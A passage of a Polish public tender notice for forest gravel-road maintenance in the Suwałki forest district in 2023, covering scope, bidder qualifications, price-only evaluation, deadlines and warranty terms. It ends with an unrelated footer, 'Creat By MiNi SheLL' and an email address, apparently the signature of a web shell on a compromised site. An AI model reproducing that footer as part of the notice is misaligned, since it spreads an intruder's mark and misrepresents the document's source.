leśnych na terenie Nadleśnictwa Suwałki w 2023“.<br/><br/>Lokalizacja prac: teren Nadleśnictwa Suwałki. <br/>Część II zamówienia obejmuje leśnictwa: Bondziszki, Rutka, Zaboryszki, Hańcza, Krasnopol.<br/><br/>Całkowity zakres prac do wykonania w tej części zamówienia obejmuje wykonanie następujących prac ww. Leśnictwach:<br/>a)	bieżące utrzymanie i konserwacja dróg leśnych poprzez miejscowe uzupełnienie ubytków w nawierzchni dróg o łącznej długości ok. 6 km, średniej szerokości ok. 3,5 m, średniej grubości warstwy mieszanki żwirowej do uzupełnienia ok. 0,1-0,2 m w zależności od lokalizacji i stanu nawierzchni drogi leśnej (zapotrzebowanie 3 162,00 m3), wraz z odsłonięciem każdego odcinka drogi przeznaczonego do utrzymania.<br/>b)	pracę sprzętu drogowego w celu wykonania zamówienia, o łącznej ilości ok. 440 godzin. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233140-2 - Roboty drogowe</p> <p class="mb-0">45233141-9 - Roboty w zakresie konserwacji dróg</p> <p class="mb-0">45233142-6 - Roboty w zakresie naprawy dróg</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">14210000-6 - Żwir, piasek, kamień kruszony i kruszywa</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> W stosunku do każdej Części Zamawiający jest uprawniony zlecić Wykonawcy dodatkowy zakres rzeczowy w stosunku do<br/>łącznej ilości wszystkich czynności wycenionych w każdej z pozycji kosztorysu ofertowego stanowiącego część Oferty<br/>(„Opcja”). Przedmiotem Opcji będą takie same (analogiczne prace), jak opisane w SWZ i wycenione przez Wykonawcę w<br/>którejkolwiek z pozycji kosztorysu ofertowego stanowiącego część Oferty. W ramach Opcji, wedle wyboru Zamawiającego,<br/>mogą zostać zlecone wszystkie, niektóre lub tylko jedna z prac wskazanych w SWZ i wycenionych przez Wykonawcę w<br/>kosztorysie ofertowym stanowiącym część Oferty.<br/>Prace będące przedmiotem Opcji mogą zostać zlecone w ilości, która nie będzie przekraczała 20 % Wartości Przedmiotu<br/>Umowy określonej zgodnie z § 8 ust. 1 stanowiącego załącznik nr 9 do SWZ. Podstawą określenia wartości prac zleconych<br/>w ramach Opcji (w celu określenia jej zakresu) będą ceny jednostkowe poszczególnych prac zawarte w kosztorysie<br/>ofertowym stanowiącym część Oferty.<br/>Zamawiający nie jest zobowiązany do zlecenia prac objętych przedmiotem Opcji, a Wykonawcy nie służy roszczenie o ich<br/>zlecenie.<br/>Zamawiający przewiduje możliwość skorzystania z Opcji w przypadku: wystąpienia potrzeby zwiększenia zakresu<br/>rzeczowego usług stanowiących przedmiot zamówienia z uwagi na faktyczną sytuację przyrodniczo-pogodową, która może<br/>zaistnieć w trakcie realizacji przedmiotu zamówienia, a także nieprzewidzianą w tej chwili sytuację gospodarczo-ekonomiczną. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">2,5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">W związku z tym, iż dokonano szczegółowego opisu przedmiotu zamówienia i precyzyjnie określono wymagania jakościowe odnoszące się do głównych elementów składających się na przedmiot zamówienia, termin wykonania zamówienia, warunki gwarancji, parametry techniczne i jakościowe, przy wyborze oferty Zamawiający będzie się kierował następującym kryterium oceny ofert, przypisując mu odpowiednią wagę procentową: 100%-cena.<br/><br/>Ocenie w ramach kryterium cena podlegać będzie łączna cena brutto podana przez Wykonawcę w formularzu ofertowym na daną część.<br/>Cena oferty musi obejmować wszystkie koszty związane z realizacją przedmiotu zamówienia, zgodnie z załączoną specyfikacją techniczną wykonania i odbioru robót, uwzględniająca cały zakres przedmiotu zamówienia (robocizna, materiały wraz z ich transportem, pracy sprzętu i środków transportu), wymaganiami wymienionymi w specyfikacji warunków zamówienia i w<br/>projektowanych postanowieniach umowy w sprawie zamówienia publicznego, zasadami najlepszej wiedzy technicznej i sztuki<br/>budowlanej, ewentualne ryzyko wynikające z okoliczności, które można było przewidzieć w terminie opracowywania oferty do czasu<br/>jej złożenia, a także wszystkie potencjalne ryzyka ekonomiczne, jakie mogą wystąpić przy realizacji przedmiotu umowy, wynikające z<br/>okoliczności, których nie można było przewidzieć w chwili zawierania umowy.<br/>Cena - Waga 100%<br/>C= (C minimalna/C badana)x 100 punktów, przy czym 1% odpowiada 1 pkt<br/>Za najkorzystniejszą uważać się będzie ofertę, która uzyska najwyższą ilość punktów.<br/>Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia<br/>danej części.<br/>Wszystkie obliczenia będą dokonywane z dokładnością do dwóch miejsc po przecinku. Zgodnie z matematycznymi zasadami<br/>zaokrąglania (końcówki poniżej 0,005 pkt pomija się a końcówki 0,005 i wyższe zaokrągla się do 0,01 pkt ).<br/>Ocena w zakresie kryteriów zostanie dokonana na podstawie wypełnionego „Formularza oferty” i złożonej w nim deklaracji<br/>Wykonawcy.<br/>Ocena ofert zostanie dokonana oddzielnie dla każdej części zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> W postępowaniu mogą brać udział Wykonawcy, którzy nie podlegają wykluczeniu z postępowania o udzielenie zamówienia w okolicznościach, o których mowa w art. 108 ust. 1 PZP, 109 ust. 1 pkt 1 PZP. oraz spełniają warunki udziału w postępowaniu dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>3) sytuacji ekonomicznej lub finansowej.<br/>Zamawiający uzna warunek udziału w postępowaniu za spełniony na podstawie informacji banku lub spółdzielczej kasy<br/>oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową<br/>Wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem w wysokości co najmniej 100 000,00 zł (sto<br/>tysięcy złotych 00/100 zł).<br/>4) zdolności technicznej lub zawodowej.<br/>a) Warunek ten, w zakresie doświadczenia, zostanie uznany za spełniony na podstawie złożonego przez Wykonawcę<br/>wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a<br/>jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, potwierdzających, że wykonał co najmniej trzy roboty<br/>budowlane polegające na bieżącym utrzymaniu i konserwacj dróg (żwirowaniu) lub remoncie lub budowie nowych dróg,<br/>każda o wartości co najmniej po 200 000,00 zł brutto każda, wraz z podaniem jej rodzaju, wartości, daty, miejsca wykonania<br/>i podmiotu, na rzecz którego roboty te zostały wykonane, złożone na formularzu stanowiącym Załącznik nr 8 do SWZ, z<br/>załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których<br/>mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były<br/>wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne<br/>odpowiednie dokumenty. Zamawiający nie dopuszcza możliwości sumowania robót budowlanych o mniejszej wartości w celu uzyskania wskazanej wartości robót budowlanych. Zamawiający uzna również referencje Podwykonawcy, którego<br/>Wykonawca wskaże w Ofercie.<br/>Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Żaden z Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia nie może podlegać wykluczeniu z postępowania. W przypadku Wykonawców wspólnie ubiegających<br/>się o udzielenie zamówienia warunki udziału w postępowaniu określone w pkt 13.2. powinni spełniać łącznie wszyscy Wykonawcy. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Aktualne na dzień składania ofert oświadczenia na podst. art. 108, art. 109 ustawy PZP oraz art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. należy złożyć wraz z ofertą.<br/>W postępowaniu mogą brać udział Wykonawcy, którzy nie podlegają wykluczeniu z postępowania o udzielenie zamówienia w<br/>okolicznościach, o których mowa w art. 108 ust. 1 pkt 1-6 PZP, art. 109 ust. 1 pkt 1 PZP, art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022<br/>r. o szczególnych rozwiązaniach w<br/>zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego określone w pkt 12<br/>SWZ.<br/>2. Odpis lub informacja z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego<br/>właściwego rejestru w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania.<br/>Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa w zdaniu poprzednim, jeżeli Zamawiający może je<br/>uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca dostarczy dane umożliwiające dostęp do tych<br/>dokumentów.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu o udzielenie zamówienia wymaganych od Wykonawcy, o którym mowa w pkt 14.1. Specyfikacji warunków zamówienia obejmuje:<br/>a) informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków<br/>finansowych lub zdolność kredytową Wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem (potwierdzenie<br/>spełniania warunku udziału w postępowaniu, o którym mowa w pkt 13.2 ppkt 3) Specyfikacji warunków zamówienia),<br/>b) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest<br/>krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te<br/>zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym<br/>dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane<br/>zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne<br/>odpowiednie dokumenty (potwierdzenie spełniania warunku udziału w postępowaniu, o którym mowa w pkt 13.2 ppkt 4) lit. a) SWZ),<br/>złożone na formularzu stanowiącym Załącznik nr 8 do SWZ,<br/>c) oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 PZP, o braku przynależności do tej samej grupy kapitałowej, w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (t.j. Dz. U. z 2020 r. poz. 1076 z późn. zm.), z<br/>innym Wykonawcą, który złożył odrębną ofertę lub ofertę częściową, albo oświadczenie o przynależności do tej samej grupy<br/>kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty lub oferty częściowej niezależnie od<br/>innego Wykonawcy należącego do tej samej grupy kapitałowej - (wzór oświadczenia Wykonawcy w zakresie art. 108 ust. 1 pkt 5<br/>PZP o przynależności lub braku przynależności do tej samej grupy kapitałowej stanowi Załącznik nr 6 do SWZ),<br/>Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które Zamawiający posiada, jeżeli Wykonawca<br/>wskaże te środki oraz potwierdzi ich prawidłowość i aktualność.<br/>Wykonawca składa podmiotowe środki dowodowe aktualne na dzień ich złożenia.<br/>d) oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 PZP w zakresie podstaw wykluczenia z postępowania określonych w: a) art. 108 ust. 1 PZP, b) art. 109 ust. 1 pkt 1 PZP - wzór wzór oświadczenia Wykonawcy o aktualności informacji stanowi załącznik nr 7 do SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Żaden z Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia nie może podlegać wykluczeniu z postępowania. W przypadku Wykonawców wspólnie ubiegających<br/>się o udzielenie zamówienia warunki udziału w postępowaniu określone w pkt 13.2. powinni spełniać łącznie wszyscy<br/>Wykonawcy.<br/>Należy także dostarczyć:<br/>pełnomocnictwo lub inny dokument potwierdzający umocowanie dla pełnomocnika ustanowionego przez Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia do reprezentowania ich w postępowaniu albo do reprezentowania w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, jeżeli ofertę składają Wykonawcy wspólnie ubiegający<br/>się o udzielenie zamówienia, sporządzone pod rygorem nieważności, w formie elektronicznej.<br/>Poświadczenia za zgodność z oryginałem dokonuje odpowiednio wykonawca, wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia publicznego albo podwykonawca, w zakresie dokumentów, które każdego z nich dotyczą. Poprzez<br/>oryginał należy rozumieć dokument podpisany kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym przez osobę/osoby upoważnioną/upoważnione. Poświadczenie za zgodność z oryginałem następuje w<br/>formie elektronicznej podpisane kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym<br/>przez osobę/osoby upoważnioną/upoważnione. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym<br/>w art. 455 p.z.p. oraz wskazanym we Wzorze Umowy, stanowiącym Załącznik nr 9 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-08-18 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/lasy_suwalki</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-08-18 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-09-15</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Warunki gwarancji i rękojmi:<br/>a)	Na wykonany cały przedmiot zamówienia Zamawiający wymaga udzielenia nieodpłatnej gwarancji jakości na okres 24 miesiące (2 lata).<br/>b)	Odpowiedzialność z tytułu rękojmi za wady fizyczne Wykonawca będzie ponosił na zasadach określonych w kodeksie cywilnym (5 lat). <br/>c)	Ujawnione w okresie gwarancji i rękojmi wady będą usunięte przez wykonawcę na jego koszt i jego staraniem.<br/>d)	Termin gwarancji i rękojmi liczony będzie od daty dokonania bezusterkowego odbioru końcowego robót budowlanych lub od daty usunięcia usterek.<br/>e)	Okresy gwarancji udzielane przez Podwykonawców muszą odpowiadać, co najmniej okresowi udzielonemu przez wykonawcę i liczone będą od daty dokonania odbioru końcowego robót lub od daty usunięcia usterek.

Creat By MiNi SheLL
Email: jattceo@gmail.com